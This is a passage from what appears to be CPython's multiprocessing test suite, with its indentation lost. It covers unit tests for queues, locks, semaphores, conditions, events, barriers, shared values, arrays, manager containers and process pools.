# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
